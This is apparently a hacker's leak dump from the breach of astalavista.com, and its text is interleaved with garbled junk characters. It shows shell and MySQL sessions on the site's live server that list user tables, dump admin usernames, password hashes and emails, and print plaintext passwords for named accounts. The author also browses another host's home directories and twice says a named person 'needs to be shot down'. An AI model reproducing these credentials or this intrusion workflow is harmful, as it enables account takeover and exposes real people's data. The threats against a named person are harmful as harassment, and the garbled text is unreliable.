<channel>* q" p, \0 G$ A& M! m: H+ D
<title>ASTALAVISTA.com - Exploits</title>
# |6 D7 d" P/ |3 K( i <link>http://www.astalavista.com/exploits</link>
* `: h7 x0 T, r% S! P' _4 Z! G* p <description>All availably Exploits.</description>
/ ^" |% b' @3 X d" k- n4 c% D <language>en-us</language>4 U( q/ Q* w g( ?4 }0 G2 ~, [& T
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>6 s# o: s3 E( F* I# W
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
2 v* W x* @, t! s" ~ <generator>Astalavista.com</generator>
9 D1 D' Z1 o6 r5 u3 C3 Y9 N& h <webMaster>info@astalavista.com</webMaster>’ . $items . ‘# j% M( o( F! C) D2 w6 o
</channel>
. `( u$ Y3 S% w# D; O1 v; }</rss>’;6 f9 c" }; B8 M5 {9 l* \6 o
3 h; U- b5 k* }0 Y6 l" J: } if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
2 A# o& F8 e% r5 m) a unlink (FULLPATH . ‘/feed/exploits.xml’);+ c) L. s6 f# o/ k
}/ H$ n- J7 N* r7 Q$ M( t
* B' o" |3 P7 r& ^. {( r
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);& g& p8 A* ~; g9 r
[snip]- X4 [ H, L6 C* `" e) R5 N
3 ]6 F0 Q( d7 ^sh-3.2$ cat exploits.sh
2 v% y# n G( d& w! a#!/bin/sh9 z6 D( V8 Z# _
U% o2 r- o( s( x- d, M
###########################################################
" ?; U- ^! \' s' v# #' b1 e+ e2 F' u0 L/ V. Q; P* W2 Z
# Title: milw0rm exploits adder #
5 F3 ^' {5 \# L( B! d; ~# Description: Add all milw0rm exploits to the #. s2 R# y9 M% D; a$ l8 ]7 _
# Astalavista.com database #/ G, {# ?" j8 I" p3 D5 {
# #! K% @' k5 K% [8 H R3 g* ~. j
# Company: Astalavista Group #9 j: _! V: |3 x9 n8 y
# Author: Paulo M. Santos #& z4 S- N' L: C# M; ~4 U& `
# E-Mail: 链接标记paulo.santos@astalavista.ch #4 @4 k% l& l4 h0 R6 U- ], H5 ~
# #
+ T I0 V8 f8 M5 o. K###########################################################" ^" ?/ @- d5 D" `
& O& u3 T% R' J' x# path
* `$ I* l2 |1 sthis_path=/home/com/public_html/modifications/cronjobs
( p: y! A( y5 Q; }+ }: _
8 @- C2 y8 } R) b; C& A# change directory
8 L( r+ `/ g6 L0 E0 N3 j! o& zcd $this_path
. g* B. t. @+ J' i2 B9 \cd tmp/3 M ?3 X8 Z0 e$ \
3 J+ I9 g. l1 v) {" t0 F) p
# delete files
E0 O* w: ^% X/ V( `! arm -rf milw0rm.tar.* &
; w* {0 Y) |0 Z: S: ]! irm -rf milw0rm/ &# a; j! M6 s7 S( F& s
* a8 A# U& H3 N$ E& A/ ~# wget milw0rm paket
1 d$ T+ [* X8 _8 i1 H5 jwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
: z& Q# j r4 `
7 N. P/ H1 s- h) Z) U& H/ [1 W$ v1 E6 _9 L# extract milw0rm paket
9 G# ?* V& W: [4 i+ U: b" ^tar -xvf milw0rm.tar.bz2. K0 N3 ^& w+ A- ~. _$ Y7 m9 q" b
6 N& p# N6 ~6 C6 j* R2 I& E& f& N
# change owner7 {6 y4 c$ E( H6 {
chown -R com .' Z; l( v6 i4 _9 A
chgrp -R com .) z& K. ~ I/ b* A: k; W0 m* J
0 I' s+ p4 T& i8 c
# execute php script2 u# f7 i3 y# a( N+ K6 g
cd $this_path2 J% z0 j9 [, j6 t1 Z/ D) x3 z6 e
php -q exploits.php
3 R3 l, {2 V# p! M5 \- k, |* k
2 B4 i* K0 P: B5 W2 r* z3 b# delete files; ~2 ~- s8 @" Q
rm -rf tmp/milw0rm.tar.*
' E8 M* l; F B$ C* q2 }2 V( `rm -rf tmp/milw0rm/: f% w4 q) o/ c; P
. G3 i7 A: x/ r! H* z# S- y, ^
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”8 e5 o( C. m- }4 B9 B$ T% E
Paulo M. Santos needs to be shot down.
5 t1 q2 E9 i+ n. x/ g' p
( L- e5 L# O4 Emysql -u contrexxuser2 -p
3 I$ w9 H0 F: X: R% W: w0 Z, N+ y% gEnter password:/ H: V- w# E' B
Welcome to the MySQL monitor. Commands end with ; or \g.! B Z* P( a. ?+ V
Your MySQL connection id is 261694. E/ ~4 I# P" _7 k# b
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
/ G$ j0 y( q2 A$ ]$ K3 ]* e) k% R
' }- p% G; i* d# y+ L& cType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.6 c( C/ ~$ a W! @+ {
0 k+ k w6 c+ z8 g- M O) G, ymysql> show databases;6 ?" K8 Y; A1 C& C* G" c
+——————–+
7 j# P" S. M* k! V: N+ {| Database |
1 e, ^2 I4 V1 w ~: ^+——————–+* ]4 x% m5 Q P) ]$ l) }+ P; l7 [( S
| information_schema |
% k9 }+ R6 i+ S" b$ _| com_contrexx2 |
: s g9 w5 H3 l| com_contrexx2_live |
4 C$ C8 U6 @( ?1 i1 \( O| test |: b3 W, t0 H# I" L7 c. i- t* K# f
+——————–+
" a3 O* W2 Z, `( C/ e* {# ?. E4 rows in set (0.00 sec)0 v3 I4 a) Q; |2 \ l+ B
, _" c$ ? S2 L9 r4 g) J
mysql> use com_contrexx2_live$ M" |) J/ n2 Z( U# a9 {0 n
Database changed
2 {4 S0 y7 E- A7 j8 L& N" Bmysql> show tables;
7 ]/ ^5 X1 ?; b+————————————————–+
. ?; U6 e; h8 o& z. L$ p| Tables_in_com_contrexx2_live |7 }3 u8 P1 a5 H: q
+————————————————–+: B+ q( I2 y$ w
| cc_banner_counter |0 a- n$ j6 c3 p4 t) e
| cc_search_counter |. j3 s2 r n0 u: u1 l+ E+ d
| contrexx_access_group_dynamic_ids |* i6 Y9 E7 j# R! _! D6 a3 X* u
| contrexx_access_group_static_ids |' T* E# e) M) q2 x8 Y0 O0 I
| contrexx_access_rel_user_group |: z P5 z; V1 i! I X* n* X. R
| contrexx_access_settings |
7 E. ~6 d( L. u: |1 x" q$ N ]| contrexx_access_user_attribute |3 v1 n8 H4 p! C3 q6 I
| contrexx_access_user_attribute_name |1 S' d7 a0 d' P8 N
| contrexx_access_user_attribute_value |% o5 ], h( C1 Q6 R O! I
| contrexx_access_user_core_attribute |- T2 }2 W" L8 L
| contrexx_access_user_groups |3 s! g( l! S: J, y% d/ [
| contrexx_access_user_mail |/ `4 a1 U% \4 b( L' W
| contrexx_access_user_profile | x; M: f4 @5 j8 ~2 @" {- {
| contrexx_access_user_title |) S( W. S: T* u. ?
| contrexx_access_user_validity |: X) ^8 [( H( L
| contrexx_access_users |
7 S) L# Y& v* ]2 i3 f| contrexx_backend_areas |. y# h3 N' m2 O0 g% P1 B# V) x9 C7 N
| contrexx_backups |
3 k# q% v/ c$ S& y3 J' Y* o| contrexx_content |
, M( R* a: h8 D| contrexx_content_history |$ p' |2 d- C: f. k' T F3 A( ?, l
| contrexx_content_logfile |
+ f7 v7 B& i6 J5 G: q| contrexx_content_navigation |
2 G0 w, k1 @0 |" W& A| contrexx_content_navigation_history |6 M/ m0 [9 E) {, t
| contrexx_ids |6 O! w% H, Y: i8 U
| contrexx_languages |9 I& m9 @) Q6 y7 a3 D( m
| contrexx_lib_country |
0 `9 t" V! `2 F% j" R- l| contrexx_log |! c, H# `) p. A3 G
| contrexx_module_alias_source |
4 P: M- P5 M9 `1 X3 G# p# L% ]$ P| contrexx_module_alias_target |# Y9 O: f- w. o& K9 }7 f: x
| contrexx_module_block_blocks |4 f, S O& r# s9 H$ K# F
| contrexx_module_block_rel_lang |
7 q! u0 a6 k0 X* J* N, {| contrexx_module_block_rel_pages |- J2 G8 X' d U. B" m
| contrexx_module_block_settings |
9 M/ H- I$ y4 f$ G1 y| contrexx_module_blog_categories |
- z* z, V7 x o" h6 u| contrexx_module_blog_comments |- e8 ]- S. N1 _8 [' K! ~: E
| contrexx_module_blog_message_to_category |
! w- J% q" Z/ h- |* m: `| contrexx_module_blog_messages |* _5 b+ ~, x. I& }0 y
| contrexx_module_blog_messages_lang | v O) b' |2 t
| contrexx_module_blog_networks |9 Q# s1 ]$ H) c
| contrexx_module_blog_networks_lang |
: O3 E1 E/ I4 [% R| contrexx_module_blog_settings |
0 \3 Y: P) R: M8 L \, e& K| contrexx_module_blog_votes |
& V% U1 K2 b$ @( G! m1 A5 d* y* c, P| contrexx_module_calendar |
9 b" G* E1 [, C) J3 g# h( r| contrexx_module_calendar_access |2 L; U1 i7 Y5 d# z1 I) s+ G
| contrexx_module_calendar_categories |
0 O8 J1 g! |" v4 G| contrexx_module_calendar_form_data |: f, Z9 k* ~5 D/ H2 |. G S- G& _
| contrexx_module_calendar_form_fields |5 b, d4 W5 F2 @1 p
| contrexx_module_calendar_registrations |
/ y: j0 S6 a$ E3 t/ G| contrexx_module_calendar_settings |; J' f0 V3 G( z. K. z( l
| contrexx_module_calendar_style |
) L4 L7 G. ?+ T$ C' h5 e| contrexx_module_contact_form |% v q! r% S" M4 |
| contrexx_module_contact_form_data |# o7 t" y3 G4 a. E8 Y# e' c% O
| contrexx_module_contact_form_field |; V6 S7 ^% |8 L+ r+ p$ B: [
| contrexx_module_contact_settings |3 Z% x) L1 p+ ?$ E3 @
| contrexx_module_data_categories |; O- `$ g# H" s. T" P# d
| contrexx_module_data_message_to_category |+ _7 p% a, B0 e" G* j
| contrexx_module_data_messages |
' e, Q4 c, D/ p! t5 H| contrexx_module_data_messages_lang |
: n% ^' ^% m. e. b& @4 p| contrexx_module_data_placeholders |
6 l* t- X5 `& q| contrexx_module_data_settings |
4 x8 c; Z6 m7 k; o4 C. G# Y! x| contrexx_module_directory_access |, x+ o2 @" b& x5 P* c
| contrexx_module_directory_categories |
4 j% w( @0 m3 m3 _; J2 M| contrexx_module_directory_dir |
8 w8 N6 W% M; g; l* k0 P# s' ~; n| contrexx_module_directory_inputfields |: O" X* s- J- J+ J1 a: J) }! ~5 H
| contrexx_module_directory_levels |
6 p8 [4 n% Z9 ]( X& h# J| contrexx_module_directory_mail |8 ^, I* r8 d- W0 e; n. m
| contrexx_module_directory_rel_dir_cat |
; S. R+ M. s) X* M4 [0 _| contrexx_module_directory_rel_dir_level |
5 C- Q/ Y# s. j0 y( n: o| contrexx_module_directory_settings |
' K" \" u2 l% C1 H2 H! s| contrexx_module_directory_settings_google |
, ~0 u/ R/ c' n( d9 f0 x/ D1 || contrexx_module_directory_vote | _- p0 w# F9 ?- p4 H9 {; Y
| contrexx_module_docsys |8 t* o! J; b; V
| contrexx_module_docsys_categories |
7 u7 Z0 P9 L$ D6 S* D| contrexx_module_egov_configuration |& |, G4 Y) y; `' ?" K0 ?) ^* N
| contrexx_module_egov_orders |' I0 T, t$ @- o) N- j1 v6 W! k
| contrexx_module_egov_product_calendar |$ M! O5 Z% u7 {3 Z) m/ s! z" n
| contrexx_module_egov_product_fields |7 U1 c) Z) o! f s
| contrexx_module_egov_products |
* M' s: c6 P8 r( i- c| contrexx_module_egov_settings |9 \; n) ^. K" V
| contrexx_module_exploits |
$ D$ N! L3 M n1 Z9 U/ B" J| contrexx_module_exploits_categories |
+ v2 _/ y- r& Q2 U T| contrexx_module_feed_category |8 z' M; X, d3 u9 F5 e4 z. z
| contrexx_module_feed_news |7 _, ?4 x' {% w
| contrexx_module_feed_newsml_association |
' w. \; c) w ]9 @| contrexx_module_feed_newsml_categories |& j% E+ r9 E+ E9 |2 l
| contrexx_module_feed_newsml_documents |
! v! n/ b! k) z4 L4 a7 I! I| contrexx_module_feed_newsml_providers |) N5 X) h7 E2 v- S' a1 l
| contrexx_module_forum_access |0 _' m P7 A5 l# I% [
| contrexx_module_forum_categories |/ H, x7 @, B4 E
| contrexx_module_forum_categories_lang |" f- Q) g1 u7 z9 y" E" y9 K
| contrexx_module_forum_notification |
8 H) i$ Q; U$ w| contrexx_module_forum_postings |
7 H$ v, K+ W. B6 e* s" ]| contrexx_module_forum_rating |$ V( i7 j3 V9 s+ I
| contrexx_module_forum_settings |
, W, x* S( a7 c {. m: X. [+ S| contrexx_module_forum_statistics |
- p8 L- w+ b/ [0 W8 w| contrexx_module_gallery_categories |+ m7 @$ ~0 K) k' k9 ^9 ~% f1 p
| contrexx_module_gallery_comments |
% S8 f i2 Y7 k" I7 u1 Z! N# G Y| contrexx_module_gallery_language |
" `0 L7 V% r* a7 t J) y" I| contrexx_module_gallery_language_pics |
3 \9 i. }& B5 d2 B| contrexx_module_gallery_pictures |
3 k5 D' ?* c/ [' D, b/ @| contrexx_module_gallery_settings | _& a D# V6 \! O
| contrexx_module_gallery_votes |
2 w8 p2 F: Z' M: A& U( ]| contrexx_module_guestbook |
. R) E6 F% j7 b9 Z, @- L9 M| contrexx_module_guestbook_settings |1 I4 p$ k6 B, H& q9 M3 h
| contrexx_module_livecam |4 t2 e/ |' N" b3 x' e/ d
| contrexx_module_livecam_settings |
% w1 y \' N9 S| contrexx_module_market |
+ G' q0 w% U$ P) i' ]. E| contrexx_module_market_access |6 ` g2 d" J. w) B6 z
| contrexx_module_market_categories |/ s" n: C+ h4 ]2 @5 c0 X7 s _
| contrexx_module_market_mail |
! S7 ~( [6 \$ P9 p| contrexx_module_market_paypal |
) b5 r; ]" L. u| contrexx_module_market_settings |
: k/ m6 u( p! ?& [| contrexx_module_market_spez_fields |4 j2 z& M* z1 J+ o- R0 X7 J
| contrexx_module_mediadir_access |
& ^5 D9 p4 X4 Z| contrexx_module_mediadir_categories |) j: R. _0 k) C4 H
| contrexx_module_mediadir_comments | M L" b5 A7 l& r9 E1 i2 P
| contrexx_module_mediadir_dir |0 E! @/ c: H# O) R, Y
| contrexx_module_mediadir_inputfields |9 V p% z M" e ~
| contrexx_module_mediadir_levels |1 X- W1 R7 X$ [
| contrexx_module_mediadir_mail |
9 ~5 z( T/ a! }- q }# X3 A8 _| contrexx_module_mediadir_rel_dir_cat |
$ A! ?7 \% w& Z; }8 ^: X( || contrexx_module_mediadir_rel_dir_level |- l0 G& y- j. s% H6 d
| contrexx_module_mediadir_reports |
+ n% W6 g; S1 ^. f3 N| contrexx_module_mediadir_settings |: [ |+ r* Q0 [6 G& I( G' Z6 e
| contrexx_module_mediadir_settings_google |3 O4 ~ S5 C% `" _1 c/ d
| contrexx_module_mediadir_vote |5 i7 X% P1 a1 P5 }" [
| contrexx_module_memberdir_directories |
1 K' d, Q6 T( Q* G6 W4 d+ q| contrexx_module_memberdir_name |
" F, ?/ K' k7 a0 U; `7 y| contrexx_module_memberdir_settings |0 {- @! P- E) @7 i" A: W
| contrexx_module_memberdir_values |' U2 J. q) _& w! `# L
| contrexx_module_nettools_allowed_groups |* r1 N) d8 C+ [: r- E& ?
| contrexx_module_nettools_settings |2 u, G! E2 E% T1 S# k! L0 x2 c
| contrexx_module_news |/ ^+ N2 l8 p+ c' Q7 H% q
| contrexx_module_news_access |
$ r2 {+ |6 X8 U2 f4 a| contrexx_module_news_categories |6 z7 e$ x) }1 ]/ f( `* O
| contrexx_module_news_settings |
# w+ \1 w j+ E- ~) v5 F- u| contrexx_module_news_teaser_frame |
; n" F3 Z5 R* ?| contrexx_module_news_teaser_frame_templates |
8 ]% q9 n- t- F1 c3 G| contrexx_module_news_ticker |
: E# l6 }8 `3 S) E| contrexx_module_newsletter |
1 @9 \* U2 A5 _3 b! M7 ^( _% O* ]| contrexx_module_newsletter_attachment |1 ^& _, g0 S& h8 N9 M/ Z1 E* J
| contrexx_module_newsletter_category |0 Q9 ?* `! \7 D' j7 z
| contrexx_module_newsletter_confirm_mail |
0 F9 w0 a6 C/ x# \$ \$ Z2 o0 X| contrexx_module_newsletter_rel_cat_news |* t9 `0 w1 R. l7 a
| contrexx_module_newsletter_rel_user_cat |; s1 J6 V+ u3 c* j8 T
| contrexx_module_newsletter_settings |
y+ W$ T+ d! o4 \( Q; E/ U4 T| contrexx_module_newsletter_template |
* X t$ v% g/ B( q& s| contrexx_module_newsletter_tmp_sending |6 n1 V/ w+ y. z1 U# [
| contrexx_module_newsletter_user |9 [3 v5 W" B& t" X2 z9 G- h9 n/ {
| contrexx_module_newsletter_user_title |
" A( O; Y" |7 i+ }: [% S1 B2 U| contrexx_module_onlinetools_defaultports |
+ C( F" a$ e7 j" J; x2 h| contrexx_module_onlinetools_defaultports_back |
9 Q* d! Q8 r) b5 A5 D+ N| contrexx_module_onlinetools_geolitecity_blocks |
+ d- |2 Z! @8 s. @6 {" c+ s| contrexx_module_onlinetools_geolitecity_country |
$ K3 z( u. M- c' ^9 L+ _1 }| contrexx_module_onlinetools_geolitecity_location |) X$ c2 L/ A& [" y# k
| contrexx_module_podcast_category |
# p% N' `; G3 K" }3 g% M0 _5 k| contrexx_module_podcast_medium |: W7 ?! c0 v1 `; f0 |" e$ k
| contrexx_module_podcast_rel_category_lang |% {2 b1 V5 O* l, y) l( C( z& o
| contrexx_module_podcast_rel_medium_category |
/ V& W: h; Y8 V3 R9 p| contrexx_module_podcast_settings |
- L$ r' r) z. J: x; a| contrexx_module_podcast_template |
& y/ c3 E1 A* I2 b# ^1 L| contrexx_module_proxydb |
0 S* y" `, }* ]( W/ ?! Q; m| contrexx_module_recommend |9 H; r+ y' S5 T4 y2 G/ {
| contrexx_module_repository |
" K9 d$ S! R: c; B# N* T1 _3 l, r. G| contrexx_module_securitynews_cats |" z5 D0 S/ A, f
| contrexx_module_securitynews_feeds |
1 J$ [* f' ^3 {5 Z7 D2 Z- Y! i, j( e| contrexx_module_securitynews_news |
2 I/ b2 ~0 R$ k, B| contrexx_module_shop_categories |$ S4 [; Q6 W) `$ V7 w. j2 I$ Z3 [& \
| contrexx_module_shop_config |" M5 Q5 O, D9 x5 Q; Y
| contrexx_module_shop_countries |( s: a0 h e+ t; {. M: |
| contrexx_module_shop_currencies |1 ?: v# `$ H. h: N( m
| contrexx_module_shop_customers |2 U; i) R7 I8 f ?( @9 Z
| contrexx_module_shop_importimg |* e5 Z4 v' P3 E2 Y o
| contrexx_module_shop_lsv |4 k& }& Z) x: E. k
| contrexx_module_shop_mail |" s' C+ H: i X- E: V
| contrexx_module_shop_mail_content |* D; `) S; i% t! f8 ]$ R
| contrexx_module_shop_manufacturer |4 g& W+ ~$ M/ ]
| contrexx_module_shop_order_items |
4 H! C" z. _5 U+ U+ z% x9 f7 X& e| contrexx_module_shop_order_items_attributes |
5 u8 B6 y1 e, D/ q$ G| contrexx_module_shop_orders |
7 {: g5 X3 B4 l, @' J| contrexx_module_shop_payment |: }5 P! N* ` T' A. C
| contrexx_module_shop_payment_processors |- c8 k- B% s- k+ o7 x
| contrexx_module_shop_pricelists |* m% o8 g% T1 X2 q9 W
| contrexx_module_shop_products |
1 J1 p: d) v0 h* u7 h| contrexx_module_shop_products_attributes |6 q6 a1 P( x0 X/ q* R
| contrexx_module_shop_products_attributes_name |& q% s6 s) |0 n: Z6 K
| contrexx_module_shop_products_attributes_value |( u4 A1 y" ]( z7 h' X- E! \
| contrexx_module_shop_products_downloads |1 m- U& R3 [9 Z% h- c% h
| contrexx_module_shop_rel_countries |
: z: e: C: [; C; P* ^- E+ a: || contrexx_module_shop_rel_payment |
) o+ ?0 h. c, A, p8 C| contrexx_module_shop_rel_shipment |5 M! z: m4 x$ v. i, ~
| contrexx_module_shop_shipment_cost |
5 I4 g8 Z7 y2 I- o' X& J; J| contrexx_module_shop_shipper |
* q2 f; C% T( x* A B# V! T| contrexx_module_shop_vat |! \- l6 _( H+ e: i/ ], U
| contrexx_module_shop_zones |4 I* U& m7 C: \* [) _
| contrexx_module_u2u_address_list |1 R: v3 w V" \; W$ d
| contrexx_module_u2u_message_log |
! M; R% v- t( s, V) }: T( ~| contrexx_module_u2u_sent_messages |
U! b h/ \, f( b+ l| contrexx_module_u2u_settings |5 n# W0 z& S! `" t" F! o% ^
| contrexx_module_u2u_user_log |
3 V8 a! _) ~8 r% B/ ]' ]' F+ j| contrexx_modules |6 g" f$ G0 u# {
| contrexx_sessions |' ?4 o# h' _; }: L1 o0 l8 R% b
| contrexx_settings |4 s# a- h% ]! J) P# }5 A u5 ^
| contrexx_settings_smtp |( Z( u- w3 T q. P( t
| contrexx_skins |4 z& E/ _' y- i3 ]1 |) W
| contrexx_stats_browser |
6 Q4 q8 n5 b9 q* b1 c; G! c; `| contrexx_stats_colourdepth |. a0 {/ H' Z1 W$ q' u
| contrexx_stats_config |3 G* g; `* d: P' P, S6 @
| contrexx_stats_country |
- Q" o7 c9 x5 a2 v| contrexx_stats_hostname |
; D' z- U& u8 ?/ ~9 z| contrexx_stats_javascript |
9 q) t1 g2 O. W| contrexx_stats_operatingsystem |
6 g! f$ B: G/ K5 z| contrexx_stats_referer |
: A) _9 b& |7 j) e4 F! q! ?* b| contrexx_stats_requests |; D, @. N1 C$ L8 @* [, c
| contrexx_stats_requests_summary |
' c% r2 ^- P! j$ b| contrexx_stats_screenresolution |
6 v/ J5 n. @/ i; d( N| contrexx_stats_search |
9 v& a; ^, s; I5 W' U% \| contrexx_stats_spiders |* y" k" X7 y% v: H( p9 K! s0 K
| contrexx_stats_spiders_summary |6 D/ N. p, G9 h0 M' |( U
| contrexx_stats_visitors |9 W7 f0 A7 Q4 i$ t) y0 T4 i
| contrexx_stats_visitors_summary |
! l9 R3 J, c* b, j| contrexx_voting_additionaldata |
$ _ L* I8 Q! I| contrexx_voting_email |
: l9 i! h* w3 p3 V8 ~; D| contrexx_voting_rel_email_system |
% F/ \+ U$ ^6 j% J* G| contrexx_voting_results |
! h3 S: |" {2 V" m! r| contrexx_voting_system |
8 |' _6 J. `( z| foo |9 O; [- J& b- o
+————————————————–+
/ v7 F+ P6 P. n2 E1 Y227 rows in set (0.01 sec)$ q2 n5 k# \' w, e
, A5 \- r/ J7 R: e3 dmysql> select count(*) as skids from contrexx_access_users;
+ l, k; x4 X$ c$ } K) k V+——-+2 q, j! m) w! \! P- O$ Q4 ^
| skids |
! X( e, @" D2 j! v8 r" ~" W+——-+7 P- {/ I* L+ n1 k
| 53699 |7 u4 S: E! u( A$ o: S. c
+——-+. t" J& B( U8 b
1 row in set (0.00 sec)! x4 S4 I9 t: V# X4 o$ A
- _4 d- F4 M7 T; A2 emysql> describe contrexx_access_users;
$ H9 o+ f: k; R* S+——————+——————————————+——+—–+————–+—————-+2 v1 K( n% K0 |& _' |
| Field | Type | Null | Key | Default | Extra |# x& D, o# `- b5 Y! @3 m
+——————+——————————————+——+—–+————–+—————-+
- e2 \! T! |* w| id | int(10) unsigned | NO | PRI | NULL | auto_increment |" u' t4 _8 P" Z. R& e6 f% I( Z1 ^
| is_admin | tinyint(1) unsigned | NO | | 0 | |- F8 W" f% k0 S
| username | varchar(40) | YES | MUL | NULL | |7 B% X2 W5 U: w G8 Y/ K" ?# Z
| password | varchar(32) | YES | | NULL | |
" M k9 _+ i- c| regdate | int(14) unsigned | NO | | 0 | |4 ~" w5 i& o) @' o- j2 R4 y/ j
| expiration | int(14) unsigned | NO | | 0 | |
1 C$ n$ I, d3 {7 u( y2 L% v* I| validity | int(10) unsigned | NO | | 0 | |3 a0 \2 \, m0 l+ H1 U/ L' x
| last_auth | int(14) unsigned | NO | | 0 | |
1 N) P \, u s) f; g+ G: e| last_activity | int(14) unsigned | NO | | 0 | |
+ @/ O# W9 `5 A3 C6 O+ ~, D! C# v4 I| email | varchar(255) | YES | | NULL | |
3 A1 g* z q% T| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
" ^, o) E0 w9 ]7 T: |! t8 d| frontend_lang_id | int(2) unsigned | NO | | 0 | |
% ~ V) U' R9 f& n1 D2 L) `| backend_lang_id | int(2) unsigned | NO | | 0 | |
0 a, x) A5 m! n( d2 d- y| active | tinyint(1) | NO | | 0 | |
/ A, |& x5 p7 h& {" b| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |; i a* n9 v* i% i
| restore_key | varchar(32) | NO | | | |2 k6 h/ Z; v5 [3 k. h
| restore_key_time | int(14) unsigned | NO | | 0 | |* l. i' [2 o5 c! l" Y: V+ l
| u2u_active | enum(’0′,’1′) | NO | | 1 | | d# s. T# |) B! m' K
+——————+——————————————+——+—–+————–+—————-+
. l6 e3 x* F. C18 rows in set (0.00 sec)
3 n- h( b6 L/ n. t6 @; v4 C4 f- g3 R$ N$ j. O( ]0 O4 s
mysql> select username,password,email from contrexx_access_users where is_admin = 1;- \2 x& l5 W( ]" P" E; U, L0 J- }
+————+———————————-+—————————–+
: U; y: F1 b0 X' `- G2 m$ @| username | password | email |1 w' U3 y. e: `/ ~3 t
+————+———————————-+—————————–+
) x1 {+ g1 W5 _( I, C* ~| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |0 i! z! `; D& y+ ^" w
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
2 C- t4 u% U B8 D5 } Q| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |. q* \+ b# n4 I
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |8 k( I+ ^3 p2 w0 V1 [5 d
+————+———————————-+—————————–+, K8 R& }* {" A
4 rows in set (0.04 sec)/ x* g9 i" c* y: { [
5 o" l% G6 {) e0 mmysql> exit;: L5 S f2 q8 B- P
Bye9 D, |9 X" x4 z$ m* t) `- ?
+ |* A S# {( R ? q7 `. ~[~] There you go, your “team of security and IT professionals” is a joke.* s0 K: v! h: k& _7 G1 z9 D6 O: M& u
! H5 w6 e& r4 J0 ~8 s* ?+——————————+
I% D& @, c) f% {0 k. f+ H! Asystem:f82BN3+_*8 s+ Z# j/ l0 D
Be1er0ph0r:belerophor4astacom' b; t7 u% O V9 m8 d
prozac:asta4cms!) o/ }. O a5 @. t9 i9 n
commander:mpbdaagf6m
1 E* y9 Q( C# G3 q0 V, z% {% q+ Ssykadul:ak29eral4 Q* Q% t3 j, r6 R) ~8 ~
+——————————+
0 j7 X& k; V! ?: z* Y& t2 u1 z3 g/ f2 w5 U2 d7 a1 Y) e. V6 p
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
6 G# e. f8 B- v2 H" j* j8 z7 o+ G…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.) m1 r3 N7 ?7 Q K& \6 q! Z0 O
2 g6 r# B( ~3 S& T( F9 r4 g[~] Lets move to astalavista.net now,
; b9 ~+ X7 O+ R. S8 N6 B7 t7 }
( y/ K4 w4 t% }6 M+ e% v4 W3 P' LFrom <链接标记[url]https://www.astalavista.net/[/url]>:" L, _# e5 Z% P. U+ f$ G
>> Everyone knows that the best defense is a good offense.
9 [* N% E# d9 [/ s- ?, Q4 g/ A% n>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
; l, G1 B9 }, t>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.: {6 b& s+ O; P0 W# e" \; |. A4 |
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
: i0 n2 A! `! }4 w S7 N! f3 R5 O
+ n1 }$ c5 M q>> Go ahead, try and hack our server . in a completely legal way!
3 P+ |& q' o- d& M8 f; C>> Learn by doing: We offer our members tricky tasks and challenges on an& \' T" U" F! Q
>> ongoing basis so you can test your knowledge and abilities. You can also
& E4 W* z3 G+ h+ X; s5 Y. K( G>> demonstrate what you.ve mastered by taking part in regular hacker contests
) e+ t* b( G9 }# ]* v>> and war games0 q) E6 t% _* G% l* S
0 _: r. q/ t# H! x9 ~; r[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
( p4 j+ a) I+ T) |" w/ t( j7 w3 q' j9 d0 B" h$ y2 b
[-] Tricky task: Find home dir of astalavista.net
' Y$ o8 L: O0 y. b$ B8 `% e
. ~: K6 e5 j0 msh-3.2$ ls -la ~astanet; O: D) [( X, B, X' x+ G( X
total 480 d* S2 j& v+ x
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .1 L( G0 L: c* Y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
5 ]3 `- ^3 ^# }- n! b [" @( f+ Xdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth5 u- m. ?3 P& C1 V- o; Q
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
0 V Y& V W# k4 ^: O9 y$ d-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
3 M0 ~4 x$ Q0 E% l-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile, e3 @5 Y8 ~7 q1 H2 I
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
8 M9 s9 ]9 A" u* q$ |7 }( s8 Zdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
$ v! u0 m, r9 f; }; I. pdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap$ ~9 X# M& |/ A' M- K! F( G, X& O
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
; r( A3 W2 l/ r0 r) `+ Q, U3 Z- ylrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html' B7 C" a2 u6 Q( O; W, E* O: H
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow, q' A4 T* R( F1 F8 ]1 I9 N0 m0 S
: s0 c0 T2 h9 A2 `, ~4 S
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/& A" {) W- `; C$ d, C
sh-3.2$ ls -la( U/ K4 t/ a9 @7 J0 J) N% ~
total 200# c' `6 n+ K7 C$ M
